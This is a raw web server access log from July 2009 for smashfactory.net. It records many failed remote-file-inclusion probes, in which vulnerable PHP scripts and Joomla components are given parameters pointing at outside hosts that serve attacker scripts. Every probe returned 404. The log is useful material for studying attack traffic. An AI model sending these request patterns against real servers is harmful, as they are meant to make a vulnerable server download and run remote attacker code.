67.208.139.72 - - [04/Jul/2009:17:01:35 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
67.208.139.72 - - [04/Jul/2009:17:01:35 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
67.208.139.72 - - [04/Jul/2009:17:01:35 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
67.208.139.72 - - [04/Jul/2009:17:01:36 -0700] "GET /include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
67.208.139.72 - - [04/Jul/2009:17:01:36 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
67.208.139.72 - - [04/Jul/2009:17:01:36 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
67.208.139.72 - - [04/Jul/2009:17:03:23 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
116.121.201.73 - - [04/Jul/2009:17:07:05 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
116.121.201.73 - - [04/Jul/2009:17:07:06 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
116.121.201.73 - - [04/Jul/2009:17:07:10 -0700] "GET /modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
116.121.201.73 - - [04/Jul/2009:17:07:10 -0700] "GET /logs//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
116.121.201.73 - - [04/Jul/2009:17:07:10 -0700] "GET /logs/access.log%20%20//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
116.121.201.73 - - [04/Jul/2009:17:10:34 -0700] "GET /logs/access.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
116.121.201.73 - - [04/Jul/2009:17:11:09 -0700] "GET /logs/access.log//modules/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
209.51.133.202 - - [04/Jul/2009:17:27:31 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
209.51.133.202 - - [04/Jul/2009:17:27:31 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
209.51.133.202 - - [04/Jul/2009:17:27:31 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
209.51.133.202 - - [04/Jul/2009:17:29:37 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:38:40 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:38:40 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:38:40 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:38:47 -0700] "GET /config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:38:47 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:38:47 -0700] "GET /logs/access.log%20%20//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:41:01 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:17:41:09 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
116.121.201.73 - - [04/Jul/2009:18:00:41 -0700] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
116.121.201.73 - - [04/Jul/2009:18:00:42 -0700] "GET /logs/access_090129.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
116.121.201.73 - - [04/Jul/2009:18:00:42 -0700] "GET /logs/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
116.121.201.73 - - [04/Jul/2009:18:03:20 -0700] "GET /logs/access_090129.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:09:31 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:09:31 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:09:31 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:09:33 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:09:33 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:09:33 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
209.51.133.202 - - [04/Jul/2009:18:10:45 -0700] "GET /logs/access.log/index.php?body=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:24:00 -0700] "GET /logs/access.log//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:24:00 -0700] "GET /citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:24:01 -0700] "GET /logs//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:24:27 -0700] "GET /citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:24:27 -0700] "GET /logs//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:24:27 -0700] "GET /logs/access.log%20%20//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:24:42 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:24:42 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:24:42 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:24:55 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:24:55 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:24:55 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:26:24 -0700] "GET /logs/access.log%20%20//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:26:28 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:26:28 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:26:28 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:26:28 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:26:28 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:26:28 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:26:32 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:26:32 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:26:32 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:26:34 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:26:34 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:26:34 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
84.207.17.120 - - [04/Jul/2009:18:26:58 -0700] "GET /logs/access.log//citywriter/head.php?path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:30:56 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:30:56 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
83.98.209.71 - - [04/Jul/2009:18:30:56 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:32:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:32:02 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:32:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:32:02 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:32:02 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:32:02 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:36:58 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:36:58 -0700] "GET /include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:36:59 -0700] "GET /logs/include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:40:09 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
211.230.156.161 - - [04/Jul/2009:18:40:15 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:43:28 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
195.34.78.110 - - [04/Jul/2009:18:43:31 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:10:34 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:10:34 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:10:34 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:12:16 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:12:19 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:12:36 -0700] "GET /logs/access_090129.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:15:49 -0700] "GET /logs/access_090129.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:21:33 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:21:33 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:21:36 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:23:47 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:33:11 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:33:53 -0700] "GET /allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:33:54 -0700] "GET /logs/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:33:55 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:33:55 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:33:58 -0700] "GET /logs/access.log%20%20/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:33:59 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:34:28 -0700] "GET /logs/access.log/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:34:28 -0700] "GET /logs/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:34:28 -0700] "GET /allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
201.232.54.48 - - [04/Jul/2009:19:42:00 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:44:06 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:44:06 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:44:10 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:52:30 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
88.191.37.60 - - [04/Jul/2009:19:53:42 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
203.151.217.29 - - [04/Jul/2009:20:13:23 -0700] "GET /_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
203.151.217.29 - - [04/Jul/2009:20:13:23 -0700] "GET /logs//_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
203.151.217.29 - - [04/Jul/2009:20:13:23 -0700] "GET /logs/access.log%20%20//_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
203.151.217.29 - - [04/Jul/2009:20:19:16 -0700] "GET /logs/access.log//_?SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [04/Jul/2009:20:20:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [04/Jul/2009:20:20:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [04/Jul/2009:20:20:23 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
88.191.37.60 - - [04/Jul/2009:20:25:02 -0700] "GET /logs/access.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.smashfactory.net"
69.65.41.165 - - [04/Jul/2009:20:26:26 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
217.70.32.2 - - [04/Jul/2009:20:27:05 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
69.65.41.165 - - [04/Jul/2009:20:37:52 -0700] "GET /logs/access.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
69.65.41.165 - - [04/Jul/2009:20:37:52 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
69.65.41.165 - - [04/Jul/2009:20:37:53 -0700] "GET /logs/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
211.202.2.220 - - [04/Jul/2009:20:41:35 -0700] "GET /logs/access.log%20%20//components/allopass.php?mosConfig_live_site=http://www.kcorea.co.kr:8080/~kcorea//lib/a1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "smashfactory.net"
217.70.32.2 - - [04/Jul/2009:20:42:46 -0700] "GET /logs/access.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
217.70.32.2 - - [04/Jul/2009:20:42:47 -0700] "GET /http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
217.70.32.2 - - [04/Jul/2009:20:42:47 -0700] "GET /logs/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
69.65.41.165 - - [04/Jul/2009:20:45:22 -0700] "GET /logs/access_090129.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
217.70.32.2 - - [04/Jul/2009:20:49:51 -0700] "GET /logs/access_090129.log/http://www.kusa-knu.com/skin/latest/random/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
